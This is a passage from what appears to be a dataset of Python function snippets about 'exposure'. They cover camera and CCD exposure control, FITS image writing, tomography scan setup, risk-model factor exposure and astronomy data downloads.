None) -> pd.Series:\n risk_model = RiskModel(risk_model_id)\n factor = Factor(risk_model_id, factor_name)\n if factor.factor is None or risk_model_id != factor.risk_model_id:\n raise MqValueError('Requested factor not available in requested risk model')\n\n asset_gsid = asset.get_identifiers().get('GSID')\n\n # Establish date interval for data query\n dates = risk_model.get_dates()\n start_date = dt.datetime.strptime(min(dates), \"%Y-%m-%d\").date() if dates else None\n end_date = dt.datetime.strptime(max(dates), \"%Y-%m-%d\").date() if dates else None\n\n # Query data and append pull requested factor exposure\n all_exposures = []\n query_results = risk_model.get_data(\n measures=[Measure.Factor_Name, Measure.Universe_Factor_Exposure, Measure.Asset_Universe],\n start_date=start_date,\n end_date=end_date,\n assets=DataAssetsRequest(identifier=AssetUniverseIdentifier.gsid, universe=[asset_gsid])).get('results', [])\n for result in query_results:\n if result.get('date') in dates:\n exposures = result.get('assetData', {}).get('factorExposure', [])\n if exposures:\n all_exposures.append(\n {'date': result['date'],\n 'factorExposure': exposures[0].get(factor.factor.identifier)})\n\n # Create and return timeseries\n df = pd.DataFrame(all_exposures)\n df.set_index('date', inplace=True)\n df.index = pd.to_datetime(df.index)\n return _extract_series_from_df(df, QueryType.FACTOR_EXPOSURE)", "def wfits(self, filename=None):\n with self.lock:\n dark = self.dark\n if not filename:\n if dark != 0:\n filename = self.getNextFilename(\"dark\")\n else:\n filename = self.getNextFilename(\"object\")\n with self.lock:\n if(self.data.size == 0):\n raise FliError(\"No image available\")\n hdu = 
pyfits.PrimaryHDU(self.data)\n hdr = hdu.header\n with self.lock:\n hdr.set('DATE', self.timestamp, 'exposure begin date')\n hdr.set('INSTRUME', self.devname, 'this instrument')\n hdr.set('SERIAL', self.devsn, 'serial number')\n hdr.set('EXPTIME', self.exptime, 'exposure time (ms)')\n hdr.set('VBIN', self.vbin, 'vertical binning')\n hdr.set('HBIN', self.hbin, 'horizontal binning')\n hdr.set('CCD-TEMP', self.temp, 'CCD temperature')\n if dark != 0:\n hdr.set('SHUTTER', 'CLOSE', 'shutter status')\n else:\n hdr.set('SHUTTER', 'OPEN', 'shutter status')\n hdr.set('CCDAREA', '[%d:%d,%d:%d]' % self.expArea, 'image area')\n hdu.writeto(filename, overwrite=True, checksum=True)\n with self.lock:\n self.filename = filename", "def create_exposure(event_class,event_type,egy,cth):\n\n if isinstance(event_type,int):\n event_type = evtype_string[event_type]\n \n irf_factory=pyIrfLoader.IrfsFactory.instance()\n irf = irf_factory.create('%s::%s'%(event_class,event_type))\n\n irf.aeff().setPhiDependence(False)\n \n theta = np.degrees(np.arccos(cth))\n \n # Exposure Matrix\n # Dimensions are Etrue and incidence angle\n m = np.zeros((len(egy),len(cth)))\n\n for i, x in enumerate(egy):\n for j, y in enumerate(theta): \n m[i,j] = irf.aeff().value(10**x,y,0.0)\n\n return m", "def _generate_exposure(self, expstart, number):\n\n index_number = number - 1 # for zero indexing\n\n filename = '{:04d}_raw.fits'.format(number)\n\n exp_gen = ExposureGenerator(self.detector, self.grism, self.NSAMP,\n self.SAMPSEQ, self.SUBARRAY,\n self.planet, filename, expstart)\n\n if not self.spatial_scan:\n self.sample_rate = 1 * u.year # high number reverts to read times\n\n _, sample_mid_points, sample_durations, read_index = \\\n exp_gen._gen_scanning_sample_times(self.sample_rate)\n\n time_array = (sample_mid_points + expstart).to(u.day)\n\n if self.transmission_spectroscopy:\n star_norm_flux = self.generate_lightcurves(time_array)\n planet_depths = 1 - star_norm_flux\n else:\n planet_depths = None\n\n # x shifts - linear shift with exposure, second exposure shifted by\n # x_shifts, direct image and first exp will match.\n x_ref = self._try_index(self.x_ref, index_number)\n y_ref = self._try_index(self.y_ref, index_number)\n sky_background = self._try_index(self.sky_background, index_number)\n\n # X and Y Shifts\n x_ref += self.x_shifts * index_number\n y_ref += self.y_shifts * index_number\n x_jitter = self.x_jitter\n y_jitter = self.y_jitter\n\n if self._visit_trend:\n scale_factor = self._visit_trend.get_scale_factor(index_number)\n else:\n scale_factor = None\n\n if self.spatial_scan:\n exp_frame = exp_gen.scanning_frame(\n x_ref, y_ref, x_jitter, y_jitter,\n self.wl, self.stellar_flux, planet_depths,\n self.scan_speed, self.sample_rate, sample_mid_points,\n sample_durations, read_index, ssv_generator=self.ssv_gen,\n noise_mean=self.noise_mean, noise_std=self.noise_std,\n add_flat=self.add_flat, add_dark=self.add_dark,\n scale_factor=scale_factor, sky_background=sky_background,\n cosmic_rate=self.cosmic_rate,\n add_gain_variations=self.add_gain_variations,\n add_non_linear=self.add_non_linear,\n clip_values_det_limits=self.clip_values_det_limits,\n add_read_noise=self.add_read_noise,\n add_stellar_noise=self.add_stellar_noise,\n add_initial_bias=self.add_initial_bias,\n progress_bar=self.progess,\n threads=self.threads\n )\n else:\n exp_frame = exp_gen.staring_frame(\n x_ref, y_ref, x_jitter, y_jitter,\n self.wl, self.stellar_flux, planet_depths,\n sample_mid_points, sample_durations, read_index,\n noise_mean=self.noise_mean, 
noise_std=self.noise_std,\n add_flat=self.add_flat, add_dark=self.add_dark,\n scale_factor=scale_factor, sky_background=sky_background,\n cosmic_rate=self.cosmic_rate,\n add_gain_variations=self.add_gain_variations,\n add_non_linear=self.add_non_linear,\n clip_values_det_limits=self.clip_values_det_limits,\n add_read_noise=self.add_read_noise,\n add_stellar_noise=self.add_stellar_noise,\n add_initial_bias=self.add_initial_bias,\n progress_bar=self.progess,\n threads=self.threads\n )\n\n exp_frame.generate_fits(self.outdir, filename, ldcoeffs=self.ldcoeffs)\n\n return exp_frame", "def take_image(self, shutter='normal', exptime=0.0,\n readout=2.0, save_as=\"\", timeout=None):\n\n s = time.time()\n parameter_list = []\n readout_time = 5\n exptime_ms = 0\n\n print(self.opt.getParameter('TimeStamps'), 'timestamp')\n # 1. Set the shutter state\n shutter_return = self._set_shutter(shutter)\n if shutter_return:\n parameter_list += shutter_return\n else:\n return {'elaptime': time.time()-s,\n 'error': \"Error setting shutter state\"}\n\n # 2. Convert exposure time to ms`\n try:\n exptime_ms = int(float(exptime) * 1000)\n logger.info(\"Converting exposure time %(exptime)ss\"\n \" to %(exptime_ms)s\"\n \"milliseconds\", {'exptime': exptime,\n 'exptime_ms': exptime_ms})\n parameter_list.append(['ExposureTime', exptime_ms])\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Error setting exposure time\", exc_info=True)\n\n # 3. Set the readout speed\n logger.info(\"Setting readout speed to: %s\", readout)\n if readout not in self.AdcSpeed_States:\n logger.error(\"Readout speed '%s' is not valid\", readout)\n return {'elaptime': time.time()-s,\n 'error': \"%s not in AdcSpeed states\" % readout}\n parameter_list.append(['AdcSpeed', readout])\n\n # 4. Set parameters and get readout time\n try:\n logger.info(\"Sending configuration to camera\")\n readout_time = self._set_parameters(parameter_list)\n r = int(readout_time) / 1000\n logger.info(\"Expected readout time=%ss\", r)\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Error setting parameters\", exc_info=True)\n\n # 5. Set the timeout return for the camera\n if not timeout:\n timeout = int(int(readout_time) + exptime_ms + 10000)\n else:\n timeout = 10000000\n\n # 6. 
Get the exposure start time to use for the naming convention\n start_time = datetime.datetime.utcnow()\n self.lastExposed = start_time\n logger.info(\"Starting %(camPrefix)s exposure\",\n {'camPrefix': self.camPrefix})\n try:\n data = self.opt.readNFrames(N=1, timeout=timeout)[0][0]\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Unable to get camera data\", exc_info=True)\n return {'elaptime': -1*(time.time()-s),\n 'error': \"Failed to gather data from camera\",\n 'send_alert': True}\n\n logger.info(\"Readout completed\")\n logger.debug(\"Took: %s\", time.time() - s)\n\n if not save_as:\n start_exp_time = start_time.strftime(\"%Y%m%d_%H_%M_%S\")\n # Now make sure the utdate directory exists\n if not os.path.exists(os.path.join(self.outputDir,\n start_exp_time[:8])):\n logger.info(\"Making directory: %s\", os.path.join(self.outputDir,\n start_exp_time[:8]))\n\n os.mkdir(os.path.join(self.outputDir, start_exp_time[:8]))\n\n save_as = os.path.join(self.outputDir, start_exp_time[:8], self.camPrefix+start_exp_time+'.fits')\n\n try:\n datetimestr = start_time.isoformat()\n datestr, timestr = datetimestr.split('T')\n hdu = fits.PrimaryHDU(data, uint=False)\n hdu.scale('int16', bzero=32768)\n hdu.header.set(\"EXPTIME\", float(exptime), \"Exposure Time in seconds\")\n hdu.header.set(\"ADCSPEED\", readout, \"Readout speed in MHz\")\n hdu.header.set(\"TEMP\", self.opt.getParameter(\"SensorTemperatureReading\"),\n \"Detector temp in deg C\")\n hdu.header.set(\"GAIN_SET\", 2, \"Gain mode\")\n hdu.header.set(\"ADC\", 1, \"ADC Quality\")\n hdu.header.set(\"MODEL\", 22, \"Instrument Mode Number\")\n hdu.header.set(\"INTERFC\", \"USB\", \"Instrument Interface\")\n hdu.header.set(\"SNSR_NM\", \"E2V 2048 x 2048 (CCD 42-40)(B)\", \"Sensor Name\")\n hdu.header.set(\"SER_NO\", self.serialNumber, \"Serial Number\")\n hdu.header.set(\"TELESCOP\", self.telescope, \"Telescope ID\")\n hdu.header.set(\"GAIN\", self.gain, \"Gain\")\n hdu.header.set(\"CAM_NAME\", \"%s Cam\" % self.camPrefix.upper(), \"Camera Name\")\n hdu.header.set(\"INSTRUME\", \"SEDM-P60\", \"Camera Name\")\n hdu.header.set(\"UTC\", start_time.isoformat(), \"UT-Shutter Open\")\n hdu.header.set(\"END_SHUT\", datetime.datetime.utcnow().isoformat(), \"Shutter Close Time\")\n hdu.header.set(\"OBSDATE\", datestr, \"UT Start Date\")\n hdu.header.set(\"OBSTIME\", timestr, \"UT Start Time\")\n hdu.header.set(\"CRPIX1\", self.crpix1, \"Center X pixel\")\n hdu.header.set(\"CRPIX2\", self.crpix2, \"Center Y pixel\")\n hdu.header.set(\"CDELT1\", self.cdelt1, self.cdelt1_comment)\n hdu.header.set(\"CDELT2\", self.cdelt2, self.cdelt2_comment)\n hdu.header.set(\"CTYPE1\", self.ctype1)\n hdu.header.set(\"CTYPE2\", self.ctype2)\n hdu.writeto(save_as, output_verify=\"fix\", )\n logger.info(\"%s created\", save_as)\n if self.send_to_remote:\n ret = self.transfer.send(save_as)\n if 'data' in ret:\n save_as = ret['data']\n return {'elaptime': time.time()-s, 'data': save_as}\n except Exception as e:\n self.lastError = str(e)\n logger.error(\"Error writing data to disk\", exc_info=True)\n return {'elaptime': -1*(time.time()-s),\n 'error': 'Error writing file to disk:' % str(e)}", "def observeField(target, exposure):\n\n status = 2\n real_exposure = exposure + np.random.normal(0.0, 20.0)\n realSN2 = target['DESsn2'] + np.random.uniform(0.0, 1.0)\n\n return status, real_exposure, realSN2", "def select_exposure(self):\n exp1_selected = self.exp1_radio.isChecked()\n\n if self.recording_sequence:\n self.record_sequence() # stop current recording\n\n if 
exp1_selected: # then exp1\n ifi_ndx = self.exp1_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp1_select.currentIndex(), ifi_ndx)\n else:\n ifi_ndx = self.exp2_ifi_select.currentIndex()\n self.camera.set_exposure(self.exp2_select.currentIndex(), ifi_ndx)\n\n temp = list(self.dpar.iwindow_toggle_save)\n self.dpar.iwindow_toggle_save = list(self.dpar.iwindow[0])\n self.dpar.iwindow[0] = temp\n self._update_scrollbars()\n\n self.rec_seq_button.setEnabled(ifi_ndx > 0)\n\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "def factor_exposure(report_id: str, factor_name: str, *, source: str = None,\n real_time: bool = False, request_id: Optional[str] = None) -> pd.Series:\n return _get_factor_data(report_id, factor_name, QueryType.FACTOR_EXPOSURE)", "def exposureCallback(self, config):\n rospy.loginfo('Set exposure: {}'.format(config['exposure']))", "def __exp1_changed_callback(self, ndx):\n if self.recording_sequence:\n self.record_sequence()\n self.exp1_radio.setChecked(True)\n self.exp1_ifi_select.setCurrentIndex(0)\n self.camera.set_exposure(ndx, 0)\n self.rec_seq_button.setEnabled(False)\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "async def expose(obj, exptime, outfile, overwrite):\n\n async with obj['camera_system'] as fli:\n\n log.debug('starting camera exposures ... ')\n exposures = await asyncio.gather(*[camera.expose(exptime)\n for camera in fli.cameras],\n return_exceptions=False)\n\n log.debug('writing images to disk ... ')\n writers = []\n for exposure in exposures:\n if outfile:\n outfile = outfile.format(camera=exposure.camera)\n writers.append(exposure.write(filename=outfile,\n overwrite=overwrite))\n else:\n writers.append(exposure.write(overwrite=overwrite))\n\n await asyncio.gather(*writers, return_exceptions=True)", "def ptc_acquisition(self, explow=0.1, exphigh=2, expdelta=0.1, laserchannel = 2, lasercurrent=45.0):\n\n #\n self.laser.select(laserchannel)\n self.laser.setCurrent(laserchannel, lasercurrent)\n self.laser.enable()\n\n #self.powerup_CCD()\n self.reb.set_testtype('PTC')\n\n #self.DKD.setup_current_measurements(DKD_range)\n self.PhD.setup_current_measurements(2e-8)\n\n # Create the logging summary file\n summaryfile = os.path.join(eodir, 'summary.log')\n f = open(summaryfile, 'a')\n\n print >>f, \"# power\\t exposure time\\t file name\"\n\n effpow = self.laser.getPower(laserchannel)\n # First take bias frames\n self.log(\"Taking bias\")\n m = self.execute_reb_sequence('ClearBias', 0, 20, True )\n #to have only useful channels:\n fname = \"%s_ptc_bias_%s.fits\" % (serno, self.reb.reb.imgtag)\n i = self.conv_to_fits(channels=validamps)\n # to save FITS HDU with headers\n self.save_to_fits(i, m, fitsname=os.path.join(eodir, fname))\n\n print >>f, effpow, 0, fname\n\n for t in np.arange(explow, exphigh+expdelta, expdelta):\n # pair of flats\n for numpair in [1, 2]:\n effpow = self.laser.getPower(laserchannel)\n m = self.execute_reb_sequence('Acquisition', t)\n #to have only useful channels:\n fname = \"%s_ptc_flat%d_%05d_%s.fits\" % (serno, numpair, int(t*100), self.reb.reb.imgtag)\n i = self.conv_to_fits(channels=validamps)\n # to save FITS HDU with headers\n self.save_to_fits(i, m, fitsname=os.path.join(eodir, fname))\n\n print >>f, effpow, t, fname\n\n f.close()\n\n # Shutting down (not the lamp by default)\n self.laser.disable()\n #self.shutdown_CCD()\n # p = self.reb.start_waiting_sequence()", "def 
configure_exposure(cam,exposure):\n\n #print(\"*** CONFIGURING EXPOSURE ***\\n\")\n\n try:\n result = True\n\n # Turn off automatic exposure mode\n #\n # *** NOTES ***\n # Automatic exposure prevents the manual configuration of exposure\n # times and needs to be turned off for this example. Enumerations\n # representing entry nodes have been added to QuickSpin. This allows\n # for the much easier setting of enumeration nodes to new values.\n #\n # The naming convention of QuickSpin enums is the name of the\n # enumeration node followed by an underscore and the symbolic of\n # the entry node. Selecting \"Off\" on the \"ExposureAuto\" node is\n # thus named \"ExposureAuto_Off\".\n #\n # *** LATER ***\n # Exposure time can be set automatically or manually as needed. This\n # example turns automatic exposure off to set it manually and back\n # on to return the camera to its default state.\n\n \n\n # Set exposure time manually; exposure time recorded in microseconds\n #\n # *** NOTES ***\n # Notice that the node is checked for availability and writability\n # prior to the setting of the node. In QuickSpin, availability and\n # writability are ensured by checking the access mode.\n #\n # Further, it is ensured that the desired exposure time does not exceed\n # the maximum. Exposure time is counted in microseconds - this can be\n # found out either by retrieving the unit with the GetUnit() method or\n # by checking SpinView.\n\n if cam.ExposureTime.GetAccessMode() != PySpin.RW:\n print(\"Unable to set exposure time. Aborting...\")\n return False\n\n # Ensure desired exposure time does not exceed the maximum\n exposure_time_to_set = exposure\n exposure_time_to_set = min(cam.ExposureTime.GetMax(), exposure_time_to_set)\n cam.ExposureTime.SetValue(exposure_time_to_set)\n\n except PySpin.SpinnakerException as ex:\n print(\"Error: %s\" % ex)\n result = False\n\n return result", "def __exp2_changed_callback(self, ndx):\n if self.recording_sequence:\n self.record_sequence()\n self.exp2_radio.setChecked(True)\n self.exp2_ifi_select.setCurrentIndex(0)\n self.camera.set_exposure(ndx, 0)\n self.rec_seq_button.setEnabled(False)\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n self.write_to_log('Exposure %d ms' % et)", "def exp_scan(self, exposure_time_list):\n self.generic_scan(self.exp, exposure_time_list)", "def get_exposure_value():\n validate(request.json, 'exposureValueRequestSchema', 'swagger/getExposureValue.yml')\n logging.info(\"get_exposure_value({0})\".format(request.json))\n return database.get_exposure_value(loc=request.json['loc'],\n stime=ExposureUtil.to_timestamp(request.json['stime']),\n etime=ExposureUtil.to_timestamp(request.json['etime']),\n tres=request.json['tres'],\n tstat=request.json['tstat'])", "def exptime(et=0.02):\n if et < 0.02:\n et = 0.02\n logger.error('Exposure time less than 0.02 seconds specified, using 0.02.')\n print camera.exptime(et)\n camera.status.update()", "def query_cmd(age, feh=0.0, visual_extinction=0.0, output_fname=None):\n\n cmd_url = 'http://stev.oapd.inaf.it/cgi-bin'\n age_str = '%.5f' % age.to_value('yr')\n feh_str = '%.5f' % feh\n response = requests.post(\n cmd_url + '/cmd',\n {\n 'cmd_version': '3.3',\n 'track_parsec': 'parsec_CAF09_v1.2S',\n 'track_colibri': 'parsec_CAF09_v1.2S_S35',\n 'track_postagb': 'no',\n 'n_inTPC': '10',\n 'eta_reimers': '0.2',\n 'kind_interp': '1',\n 'kind_postagb': '-1',\n 'photsys_file': 'tab_mag_odfnew/tab_mag_ubvrijhk.dat',\n 'photsys_version': 'YBC',\n 'dust_sourceM': 'dpmod60alox40',\n 'dust_sourceC': 
'AMCSIC15',\n 'kind_mag': '2',\n 'kind_dust': '0',\n 'extinction_av': '%.3f' % visual_extinction,\n 'extinction_coeff': 'constant',\n 'extinction_curve': 'cardelli',\n 'imf_file': 'tab_imf/imf_kroupa_orig.dat',\n 'isoc_isagelog': '0',\n 'isoc_agelow': age_str,\n 'isoc_ageupp': age_str,\n 'isoc_dage': '0.0',\n 'isoc_dlage': '0.0',\n 'isoc_ismetlog': '1',\n 'isoc_zlow': '0.0152',\n 'isoc_zupp': '0.03',\n 'isoc_dz': '0.0',\n 'isoc_metlow': feh_str,\n 'isoc_metupp': feh_str,\n 'isoc_dmet': '0.0',\n 'output_kind': '0',\n 'output_evstage': '1',\n 'lf_maginf': '-15',\n 'lf_magsup': '20',\n 'lf_deltamag': '0.5',\n 'sim_mtot': '1.0e4',\n 'output_gzip': '0',\n 'submit_form': 'Submit',\n '.cgifields': ['photsys_version',\n 'isoc_ismetlog',\n 'dust_sourceC',\n 'isoc_isagelog',\n 'track_colibri',\n 'output_gzip',\n 'track_parsec',\n 'dust_sourceM',\n 'output_kind',\n 'extinction_coeff',\n 'track_postagb',\n 'extinction_curve']\n }\n )\n bs_response = BeautifulSoup(response.text, 'html.parser')\n downloaded = False\n for link in bs_response.find_all('a'):\n link_url = link.get('href')\n if link_url.endswith('.dat'):\n assert not downloaded\n data_url = '%s/%s' % (cmd_url, link_url)\n print('Downloading: ' + data_url)\n if output_fname:\n with open(output_fname, 'wb') as destination:\n destination.write(\n requests.get(data_url, allow_redirects=True).content\n )\n else:\n result = requests.get(data_url, allow_redirects=True).content\n print('Done')\n downloaded = True\n assert downloaded\n return result", "def test_exposure(self):\n lcname = os.path.join(self.datadir,\n 'monol_testA_E3-50_lc' + HEN_FILE_EXTENSION)\n ufname = os.path.join(self.datadir, 'monol_testA_uf.evt')\n command = \"{0} {1}\".format(lcname, ufname)\n\n hen.exposure.main(command.split())\n fname = os.path.join(self.datadir,\n 'monol_testA_E3-50_lccorr' + HEN_FILE_EXTENSION)\n assert os.path.exists(fname)\n ftype, contents = hen.io.get_file_type(fname)\n\n assert isinstance(contents, Lightcurve)\n assert hasattr(contents, 'expo')", "def exposure(self) -> Quantity:\n if self._exp is None:\n raise ModelNotAssociatedError(\"There are no XSPEC fits associated with this Spectrum\")\n else:\n exp = Quantity(self._exp, 's')\n\n return exp", "def exposuretime(self) -> ErrorValue:\n return ErrorValue(self._data['ExpTime'], self._data.setdefault('ExpTimeError',0.0))", "def command(self, value):\n global exposure_meter_mode_names\n for ii in range(0, len(exposure_meter_mode_names)):\n if value == exposure_meter_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMeterMode = ii\n self.tcp_comms.send_metering_mode(self.tcp_comms.tcp_params.exposureMeterMode)", "def capture_data(vx_handle, s_mode, s_channels, i_wait_count, t_timeout, b_show_status): #pylint: disable=R0913\n t_start = time.perf_counter()\n vx_handle.write('CAPTURESTART ONE, %s'%s_mode)\n i_bytes_captured = 0\n i_last_cap_byte = 0\n t_last = t_start\n while i_bytes_captured < (i_wait_count * 4 * len(s_channels)):\n i_bytes_captured = int(vx_handle.ask('CAPTUREBYTES?'))\n if b_show_status:\n show_status('dut has captured %4d of %4d samples'%\n (i_bytes_captured / (4 * len(s_channels)), i_wait_count))\n if (i_bytes_captured - i_last_cap_byte) == 0:\n if (time.perf_counter() - t_last) > t_timeout:\n print('\\n\\n**** CAPTURE TIMEOUT! ****')\n if not i_bytes_captured:\n print('**** NO DATA CAPTURED - missing trigger? 
****\\n')\n sys.exit(-1)\n break\n else:\n t_last = time.perf_counter()\n i_last_cap_byte = i_bytes_captured\n t_end = time.perf_counter()\n vx_handle.write('CAPTURESTOP')\n print('capture took %.3f seconds. Retrieving data...'%(t_end-t_start))\n return i_bytes_captured", "def set_exposure(self, expo):\n if expo == 0:\n self.exposure = 0\n elif expo == 1:\n self.exposure = min(9, self.exposure+1)\n elif expo == -1:\n self.exposure = max(-9, self.exposure-1)\n self.drone.set_exposure(self.exposure)\n log.info(f\"EXPOSURE {self.exposure}\")", "def capture_image(self):\n ext = self.image_save_type.lower()\n\n if self.calibrating:\n print('calibrating')\n\n if ext == 'fits':\n self.save_fits()\n self._image_counter += 1\n else:\n img = self.original_image\n path = os.path.join(self.home, 'data')\n name = \"camtrak_frame_{}.png\".format(self._image_counter) \n fn = os.path.join(path, name)\n cv2.imwrite(fn, img)\n\n QtWidgets.QApplication.beep()\n self.statusBar().showMessage(f'Saved image to {fn}')\n self._image_counter += 1", "def get_exposure(self):\n exposure = float(self._driver.ExposureTime)\n\n return exposure", "def expose_test(self):\n with self.lock:\n self.dark = 1\n self.tstart = time.time()\n self.timestamp = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(self.tstart))\n imagesize = (self.expArea[3] - self.expArea[1],\n self.expArea[2] - self.expArea[0])\n self.data = np.ones(shape=imagesize, dtype=np.uint16)\n self.tend = time.time()", "def set_exposure_times(self, exposure_time=None, duration=None,\n start_time=None, mid_time=None, end_time=None):\n import time, datetime\n # Modified Julian date of the \"zero epoch\" of the time library (1/1/70)\n MJD_ZEROPOINT = 40587.0\n # Number of seconds per day.\n SECONDS_PER_DAY = 86400.0\n if hasattr(self, 'meta') and hasattr(self.meta, 'exposure'):\n if exposure_time is not None:\n self.meta.exposure.exposure_time = exposure_time\n if duration is not None:\n self.meta.exposure.duration = duration\n elif exposure_time is not None:\n self.meta.exposure.duration = exposure_time\n \n if start_time == 'NOW':\n start_time = MJD_ZEROPOINT + (time.time()/SECONDS_PER_DAY)\n if start_time is not None:\n self.meta.exposure.start_time = float(start_time)\n \n if mid_time == 'NOW':\n mid_time = MJD_ZEROPOINT + (time.time()/SECONDS_PER_DAY)\n if mid_time is not None:\n self.meta.exposure.mid_time = float(mid_time)\n \n if end_time == 'NOW':\n end_time = time.time()\n elif self.meta.exposure.start_time is not None and \\\n self.meta.exposure.duration is not None and end_time is None:\n # Set the end time to start_time + duration\n end_time = self.meta.exposure.start_time + \\\n (self.meta.exposure.duration/SECONDS_PER_DAY)\n if end_time is not None:\n self.meta.exposure.end_time = float(end_time)\n else:\n strg = \"Exposure metadata attributes missing from data model\"\n raise AttributeError(strg)", "def find_exposure_time(cam,targetIntensity=100,margin=5):\n from numpy import mean\n\n if targetIntensity < 0 or targetIntensity > 255:\n print(\"Invalid target intensity\")\n return 1\n minExposure = 0.01 # Smallest value in ms\n maxExposure = 80\n counter = 0\n\n # Calculate exposures at the different end\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(minExposure))\n minIntensity = mean(Image)\n\n Image = cam.grab_image(timeout='1s', copy=True,\n exposure_time=number_to_millisecond(maxExposure))\n maxIntensity = mean(Image)\n\n midIntensity = 1\n while midIntensity < (targetIntensity - margin) or\\\n 
midIntensity > (targetIntensity+margin) and counter < 20:\n # Set exposure, take a picture and check how good it was\n counter = counter + 1\n\n midExposure = (maxExposure + minExposure) / 2\n Image = cam.grab_image(timeout='1s',\n copy=True,\n exposure_time=number_to_millisecond(midExposure))\n midIntensity = mean(Image)\n\n if midIntensity > targetIntensity: # Exposure time too short\n maxExposure = midExposure\n # maxIntensity = midIntensity\n else: # Exposure time too long\n minExposure = midExposure\n # minIntensity = midIntensity\n if counter == 100:\n print(\"WARNING: Find exposure function ran max number of iterations!\\\n No really suitable exposure setting found\")\n # Update the exposure time of the camera and return the target exposure\n cam.set_defaults(exposure_time=number_to_millisecond(midExposure))\n return midExposure#number_to_millisecond(midExposure)", "def tomoScanWithFrames(description, inBeamPosition, outOfBeamPosition, exposureTime=1., start=0., stop=180., step=0.1, darkFieldInterval=0, flatFieldInterval=0,\n imagesPerDark=10, imagesPerFlat=10, optimizeBeamInterval=0, pattern=\"default\", nframes=1, tomoRotationAxis=0, addNXEntry=True, autoAnalyse=True, additionalScannables=[]):\n dataFormat = LocalProperties.get(\"gda.data.scan.datawriter.dataFormat\")\n try:\n darkFieldInterval = int(darkFieldInterval)\n flatFieldInterval = int(flatFieldInterval)\n optimizeBeamInterval = int(optimizeBeamInterval)\n \n image_key_frame = 3\n nframes = int(nframes)\n if nframes < 1:\n nframes = 1\n \n jns = beamline_parameters.JythonNameSpaceMapping(InterfaceProvider.getJythonNamespace())\n tomography_theta = jns.tomography_theta\n if tomography_theta is None:\n raise NameError(\"tomography_theta is not defined in Jython namespace\")\n tomography_shutter = jns.tomography_shutter\n if tomography_shutter is None:\n raise NameError(\"tomography_shutter is not defined in Jython namespace\")\n tomography_translation = jns.tomography_translation\n if tomography_translation is None:\n raise NameError(\"tomography_translation is not defined in Jython namespace\")\n \n tomography_detector = jns.tomography_detector\n if tomography_detector is None:\n raise NameError(\"tomography_detector is not defined in Jython namespace\")\n\n tomography_optimizer = jns.tomography_optimizer\n if tomography_optimizer is None:\n raise NameError(\"tomography_optimizer is not defined in Jython namespace\")\n\n tomography_time = jns.tomography_time\n if tomography_time is None:\n raise NameError(\"tomography_time is not defined in Jython namespace\")\n \n tomography_beammonitor = jns.tomography_beammonitor\n if tomography_beammonitor is None:\n raise NameError(\"tomography_beammonitor is not defined in Jython namespace\")\n \n tomography_camera_stage = jns.tomography_camera_stage\n if tomography_camera_stage is None:\n raise NameError(\"tomography_camera_stage is not defined in Jython namespace\")\n \n tomography_sample_stage = jns.tomography_sample_stage\n if tomography_sample_stage is None:\n raise NameError(\"tomography_sample_stage is not defined in Jython namespace\")\n \n tomo_additional_scannables = jns.tomography_additional_scannables\n if tomo_additional_scannables is None:\n raise NameError(\"tomo_additional_scannables is not defined in Jython namespace\")\n \n index = SimpleScannable()\n index.setCurrentPosition(0.0)\n index.setInputNames([\"imageNumber\"])\n index.setName(\"imageNumber\")\n index.configure()\n \n image_key = SimpleScannable()\n image_key.setCurrentPosition(0.0)\n 
image_key.setInputNames([\"image_key\"])\n image_key.setName(\"image_key\")\n image_key.configure()\n\n tomoScanDevice = make_tomoScanDevice(tomography_theta, tomography_shutter,\n tomography_translation, tomography_optimizer, image_key, index)\n\n# return tomoScanDevice\n #generate list of positions\n numberSteps = ScannableUtils.getNumberSteps(tomography_theta, start, stop, step)\n theta_points = []\n theta_points.append(start)\n previousPoint = start\n for i in range(numberSteps):\n nextPoint = ScannableUtils.calculateNextPoint(previousPoint, step);\n theta_points.append(nextPoint)\n previousPoint = nextPoint\n \n #generateScanPoints\n optimizeBeamNo = 0\n optimizeBeamYes = 1\n shutterOpen = 1\n shutterClosed = 0\n shutterNoChange = 2\n scan_points = []\n theta_pos = theta_points[0]\n index = 0\n #Added shutterNoChange state for the shutter. The scan points are added using the (pseudo) ternary operator, \n #if index is 0 then the shutterPosition is added to the scan point, else shutterNoChange is added to scan points.\n for i in range(imagesPerDark):\n scan_points.append((theta_pos, [shutterClosed, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_dark, index)) #dark\n index = index + 1\n \n for i in range(imagesPerFlat): \n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], outOfBeamPosition, optimizeBeamNo, image_key_flat, index)) #flat\n index = index + 1\n for frm in range(nframes): \n scan_points.append((theta_pos, shutterOpen, inBeamPosition, optimizeBeamNo, image_key_project if frm==0 else image_key_frame, index)) #first\n index = index + 1 \n imageSinceDark = 1\n imageSinceFlat = 1\n optimizeBeam = 0\n for i in range(numberSteps):\n theta_pos = theta_points[i + 1]\n for frm in range(nframes):\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_project if frm==0 else image_key_frame, index))#main image\n index = index + 1 \n \n imageSinceFlat = imageSinceFlat + 1\n if imageSinceFlat == flatFieldInterval and flatFieldInterval != 0:\n for i in range(imagesPerFlat):\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], outOfBeamPosition, optimizeBeamNo, image_key_flat, index))\n index = index + 1 \n imageSinceFlat = 0\n \n imageSinceDark = imageSinceDark + 1\n if imageSinceDark == darkFieldInterval and darkFieldInterval != 0:\n for i in range(imagesPerDark):\n scan_points.append((theta_pos, [shutterClosed, shutterNoChange][i != 0], inBeamPosition, optimizeBeamNo, image_key_dark, index))\n index = index + 1 \n imageSinceDark = 0\n\n optimizeBeam = optimizeBeam + 1\n if optimizeBeam == optimizeBeamInterval and optimizeBeamInterval != 0:\n scan_points.append((theta_pos, [shutterOpen, shutterNoChange][i != 0], inBeamPosition, optimizeBeamYes, image_key_project, 